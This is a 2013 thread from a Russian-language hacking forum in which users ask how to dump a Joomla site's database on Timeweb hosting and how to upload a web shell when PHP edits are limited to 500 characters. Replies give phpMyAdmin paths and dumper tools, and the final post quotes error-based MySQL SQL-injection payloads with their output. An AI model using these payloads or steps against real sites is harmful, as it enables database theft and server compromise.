HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22831  
Старый 09.10.2013, 15:10
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Ребят, подскажите как слить базу данных jumla имея логин, пароль и имя базы? Хостинг Timeweb.
 
Ответить с цитированием

  #22832  
Старый 09.10.2013, 15:31
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию

Цитата:
Сообщение от mff  
mff said:
Ребят, подскажите как слить базу данных jumla имея логин, пароль и имя базы? Хостинг Timeweb.
попытаться найти sql-inject, если phpmyadmin на сайте не стоит
 
Ответить с цитированием

  #22833  
Старый 09.10.2013, 15:36
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от mff  
mff said:
Ребят, подскажите как слить базу данных jumla имея логин, пароль и имя базы? Хостинг Timeweb.
1. Воспользоваться PhpMyAdmin. (вкладка Export).

2. Залить дампер и слить базу (что-то типа Sypex Dumper и т.д.).
 
Ответить с цитированием

  #22834  
Старый 09.10.2013, 15:38
CrystalTears
Познающий
Регистрация: 03.09.2006
Сообщений: 68
Провел на форуме:
891978

Репутация: 229
По умолчанию

Цитата:
Сообщение от er9j6@  
er9j6@ said:
попытаться найти sql-inject, если phpmyadmin на сайте не стоит
http://sypex.net/ ?
 
Ответить с цитированием

  #22835  
Старый 09.10.2013, 16:30
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:
Воспользоваться PhpMyAdmin.
Я так и хотел сделать, но вот как узнать путь к phpmyadmin ?
 
Ответить с цитированием

  #22836  
Старый 09.10.2013, 17:10
Sum.cogitans
Guest
Сообщений: n/a
Провел на форуме:
62329

Репутация: 19
По умолчанию

Цитата:
Сообщение от mff  
mff said:
Я так и хотел сделать, но вот как узнать путь к phpmyadmin ?
Ну во-первых, если коннект к базе разрешен извне, можешь залить PhpMyAdmin на любой свой сервер, в конфиге вместо localhost прописать IP сайта / логин и пароль / авторизация http. Или через любые другие утилиты умеющие подключаться к MySQL.

Если с удаленным подключением фейл, можно попробовать типовые пути, вдруг есть на сервере:

1. В корне сайта и в каталоге admin если есть - /pma/, /phpmyadmin/, /myadmin/

2. Те же варианты, только на субдомене - pma.site.com

3. Если это хостинг на базе ISP (только прописывай именно IP а не доменное имя) - https://127.0.0.1/myadmin/
 
Ответить с цитированием

  #22837  
Старый 09.10.2013, 17:25
mff
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479

Репутация: 1809


Отправить сообщение для mff с помощью ICQ
По умолчанию

Цитата:
Сообщение от Sum.cogitans  
Sum.cogitans said:
2. Те же варианты, только на субдомене - pma.site.com
Да, там у них в зависимости от тарифа, имена имеют вид: https://bitrix132.timeweb.ru/pma/index.php и так далее.
 
Ответить с цитированием

  #22838  
Старый 09.10.2013, 17:49
Sum.cogitans
Guest
Сообщений: n/a
Провел на форуме:
62329

Репутация: 19
По умолчанию

Цитата:
Сообщение от mff  
mff said:
Да, там у них в зависимости от тарифа, имена имеют вид: https://
bitrix132
.timeweb.ru/pma/index.php и так далее.
У timeweb в зоне субдомена логин или целая площадка? Если площадка возможно повезет:

HTTP

http://phoenix.timeweb.ru/phpMyAdmin/

http://scorpius.timeweb.ru/phpMyAdmin/

HTTPS

https://phoenix.timeweb.ru/pma/

https://scorpius.timeweb.ru/pma/
 
Ответить с цитированием

  #22839  
Старый 09.10.2013, 21:14
psihoz26
Guest
Сообщений: n/a
Провел на форуме:
182660

Репутация: 324
По умолчанию

могу редактировать несколько php файлов на сервере

но к сожалению там ограничение в 500 символов кода

подскажите как можно залить шелл??
 
Ответить с цитированием

  #22840  
Старый 10.10.2013, 03:32
Always
Guest
Сообщений: n/a
Провел на форуме:
17560

Репутация: 0
По умолчанию

делают такой зпрос

'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'

вывод:

Duplicate column name '5.1.69'

отправляю такой запрос

'and(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+1, 1),floor(rand(0)*2))x+from+information_schema.tabl es+group+by+x)a)='1/

вывод:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 1

в чем дело?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ